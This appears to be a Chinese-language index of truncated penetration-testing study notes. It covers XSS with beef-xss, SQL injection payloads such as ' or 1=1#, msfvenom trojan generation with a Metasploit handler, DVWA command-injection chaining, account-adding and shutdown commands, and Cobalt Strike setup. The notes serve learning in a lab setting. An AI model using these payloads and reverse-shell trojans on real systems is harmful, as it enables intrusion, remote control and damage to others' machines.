xss
使用beef-xss进行跨站脚本攻击
Sql注入
SQL注入SQL注入也叫SQL注码,发生于应用程序与数据库层的安全漏洞。在设计的不良程序中,忽略了字符串检查,那么这些注入的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行。 例如查询用户的SQL语句 select first_name,last_name from users where user_id=’1*’ and 1=1#*’ select first_name,last_name from users where user_id=’1*’ or 1=1#*’ 斜体表示输入的内容,1总是等于1所以会被查询出来全部,#表示去掉后面有影响的SQL 怎么利用SQL注入漏洞 判断列数/字段数 order by [column_num] select first_name,last_name from users where user_id=’1*’ order by 1#*’ 如果第一列存在肯定有输出,依次增加order by 的Num select first_name,last_name from...
msfconsole
步骤 使用metasploit攻击三步走 使用模块-选择参数-发起攻击 比如搜索漏洞search ms17-010搜索永恒之蓝漏洞 use 模块名称 配置模块必选项 set 运行模块run 退出按exit 使用msfvenom生成远控木马 msfvenom是用于生成远控木马的软件,在本地监听上线,msfvenom在shell里面使用不是msfconsole终端 指令格式如下: lhost=192.168.190.129 lport=9999 -f exe -o demo.exe -p表示payload 系统/架构/作用/方式 -f表示格式 -o表示输出文件 设置多模块攻击 use exploit/multi/handler 使用这个模块 set lhost 设置本地IP set lport 设置本地端口 run 运行模块并,等待木马被执行 有会话连接就是中招了
DVWA
漏洞靶场之 DVWA 为什么要攻击网站?常见的网站漏洞有哪些? SQL注入 XSS 文件上传 反序列化 文件包含 CSRF 命令执行 信息泄露 XEE SSRF 未授权访问 SQL注入 泄露数据库,数据库中可能有账号密码 命令执行 获取目标机器命令权限,执行非法命令,破坏或控制受害机器 文件上传 上传后门病毒木马到网站中,破坏网站 命令执行漏洞 cmd1|cmd2:无论cmd1是否执行成功,cmd2将被执行 cmd1;cmd2:无论cmd1是否执行成功,cmd2将被执行 cmd1&cmd2:无论cmd1是否执行成功,cmd2将被执行 cmd1||cmd2:仅在cmd1执行失败,执行cmd2 cmd1&&cmd2:仅在cmd1执行成功,执行cmd2 常用cmd指令 whoami 查看当前用户名 ipconfig查看网卡 shutdown -s -t - 0关机 net user [username] [password] /add 增加一个用户名为username密码为password的新用户 type...
cobaltstrike
Cobalt Strike简称为CS)是一款团队作战渗透神器,是一种可以用来进行横向移动、数据窃取、鱼叉式钓鱼的后渗透工具,分为客户端和服务端,一个客户端可以连接多个服务端,一个服务端也可以对应多个客户端连接。 Server目录 修改Cobaltstrike可执行权限 运行./teamserver 192.168.190.128 123 这里分别是IP地址和密码 Client目录 打开客户端输入./cobaltstrike-client.cmd需要执行权限 IP地址为服务器IP,密码是服务器密码,账号随便输入。端口默认是50050
CDN
...
逆变器
...
